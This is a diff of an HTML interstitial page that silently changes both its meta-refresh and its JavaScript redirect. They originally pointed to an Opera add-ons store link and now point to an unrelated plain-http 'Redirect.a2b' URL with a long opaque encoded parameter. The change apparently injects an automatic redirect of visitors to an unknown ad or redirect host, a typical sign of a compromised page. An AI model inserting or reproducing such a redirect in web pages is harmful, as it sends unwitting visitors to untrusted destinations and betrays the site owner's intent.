--- a/inter.html
+++ b/inter.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <meta charset="utf-8">
 <title>Wait for it…</title>
-<meta http-equiv=refresh content="3; URL=https://addons.opera.com/en/extensions/details/worlds-most-useless-extension/">
+<meta http-equiv=refresh content="3; URL=http://new17write.com/Redirect.a2b?MediaSegmentId=32212&dcid=1_ctx_961355c1-cbb5-4392-aca1-2529461f50f2&vmId=fc670064-c89f-496f-916e-b16894004b04&abr=true&timeZoneOffset=-300&dst=False&v=jNXIOJjlJk8WG4OjCIRFf2xl-I4CLMNzfTpOoik2uZ-Zey-orIj6Hn1rnPgAzfsv8st2xQes8AsfYUiQSuMFARUzvcOj1RVvsK-MVMX4HqQK5bal1HzrYxJhxzELBsT-dd0Pta7oyqIx4-EJ1BtKgJ-5_qzuyDpwXGSkmU3aQ88kjocEStJHcqw0eJ0LHAEwWaycKtvqsmsMQwFLMK8c3eT8OKFQgWKY4f8u40J_66YdW68uD77VMSJc6ohPi2yWrMmFk0g-v1kQHBpWL8nujHD0d1x-N8BQk9SAPELZnOA02UW4uOM6O3O3hIl1CJjcmGdPK3TrURCNRFc7gImIWnj2LQrarbrU7VUsaYKtHeM5ZQMGUBomU6dPelF994jX8xbmWKtIYHRBYABaIPkKylEn0ecDYS0pKcWbOCP0uV3l9H2kgkc0vPMkEGDuBiTIBCAe3kGiAti6NhXcp_gLAGYfjanLO8exli0Cc0Efo3KVvEq-_uZX7RBt8Jx7WKV6VI1yChv4rIs9xKVFn_vQqT1cR2ezofTKv7jniPCcEpmgJ4cCEA4Fj90huspyoEWRJPZu9cVRoLwjAY2O3ickrd-zC-h2f78NJqbEF-yz2Gwk2H2cS9l4-NJvelYMk2fP7-3ZHDe-G38QvjxsiSghf8YtanPR1Qd_TzREP1uu4rVkjvCBUg37kKJcE-8vLUlVevUwCF11Oen0yYOv9NpcK367WWJtZDPX_yqDc4QZvkXi-p73gz-3TLE5vDgWt7IJIRcmVYnZnVBJEwCYbdhVYbOF2f0HhTuQa8Tmr-jYUvdaK6-WqU98QZsQ0-VPe7VYhxWWnI_jbtHstis98GVIjVHOBXaYPqUolWtPSGOyNrStP1C7k4fiL7n6o6tGxVjuymnaAbhEQdjCKeHCelPcmc9VHbP7o8dDw70hjtwRp0pBhaPXWE621igzikEnAjWyftuGLMCWaHHN_uDUtG9EraWC2cJBTIv6sqMI1QLzjAAop5EGk87L9jHOh5ivxvXRw7cYvc5xvuhtdqVOfhK4SVgAs3fK3uD7SEdUXpMy63RoPpODXARIIBdeeiwIxN26Krowwe9JCe02VO-gFJYq6wbRrhuBgxsochGJRIFfS816ysdiFjGfj2Q-t_6TpZ0BECKbikFoPJ0_6EOykZIlxewDDUCHRPUnsebo1Fvpw301&res=1920x1080/">
 <style>
 	html, body {
 		overflow:hidden;
@@ -60,6 +60,6 @@
 		document.body.className = 'loaded';
 	}, false);
 	setTimeout(function() {
-		location.href = 'https://addons.opera.com/en/extensions/details/worlds-most-useless-extension/';
+		location.href = 'http://new17write.com/Redirect.a2b?MediaSegmentId=32212&dcid=1_ctx_961355c1-cbb5-4392-aca1-2529461f50f2&vmId=fc670064-c89f-496f-916e-b16894004b04&abr=true&timeZoneOffset=-300&dst=False&v=jNXIOJjlJk8WG4OjCIRFf2xl-I4CLMNzfTpOoik2uZ-Zey-orIj6Hn1rnPgAzfsv8st2xQes8AsfYUiQSuMFARUzvcOj1RVvsK-MVMX4HqQK5bal1HzrYxJhxzELBsT-dd0Pta7oyqIx4-EJ1BtKgJ-5_qzuyDpwXGSkmU3aQ88kjocEStJHcqw0eJ0LHAEwWaycKtvqsmsMQwFLMK8c3eT8OKFQgWKY4f8u40J_66YdW68uD77VMSJc6ohPi2yWrMmFk0g-v1kQHBpWL8nujHD0d1x-N8BQk9SAPELZnOA02UW4uOM6O3O3hIl1CJjcmGdPK3TrURCNRFc7gImIWnj2LQrarbrU7VUsaYKtHeM5ZQMGUBomU6dPelF994jX8xbmWKtIYHRBYABaIPkKylEn0ecDYS0pKcWbOCP0uV3l9H2kgkc0vPMkEGDuBiTIBCAe3kGiAti6NhXcp_gLAGYfjanLO8exli0Cc0Efo3KVvEq-_uZX7RBt8Jx7WKV6VI1yChv4rIs9xKVFn_vQqT1cR2ezofTKv7jniPCcEpmgJ4cCEA4Fj90huspyoEWRJPZu9cVRoLwjAY2O3ickrd-zC-h2f78NJqbEF-yz2Gwk2H2cS9l4-NJvelYMk2fP7-3ZHDe-G38QvjxsiSghf8YtanPR1Qd_TzREP1uu4rVkjvCBUg37kKJcE-8vLUlVevUwCF11Oen0yYOv9NpcK367WWJtZDPX_yqDc4QZvkXi-p73gz-3TLE5vDgWt7IJIRcmVYnZnVBJEwCYbdhVYbOF2f0HhTuQa8Tmr-jYUvdaK6-WqU98QZsQ0-VPe7VYhxWWnI_jbtHstis98GVIjVHOBXaYPqUolWtPSGOyNrStP1C7k4fiL7n6o6tGxVjuymnaAbhEQdjCKeHCelPcmc9VHbP7o8dDw70hjtwRp0pBhaPXWE621igzikEnAjWyftuGLMCWaHHN_uDUtG9EraWC2cJBTIv6sqMI1QLzjAAop5EGk87L9jHOh5ivxvXRw7cYvc5xvuhtdqVOfhK4SVgAs3fK3uD7SEdUXpMy63RoPpODXARIIBdeeiwIxN26Krowwe9JCe02VO-gFJYq6wbRrhuBgxsochGJRIFfS816ysdiFjGfj2Q-t_6TpZ0BECKbikFoPJ0_6EOykZIlxewDDUCHRPUnsebo1Fvpw301&res=1920x1080/';
 	}, 3000);
 </script>
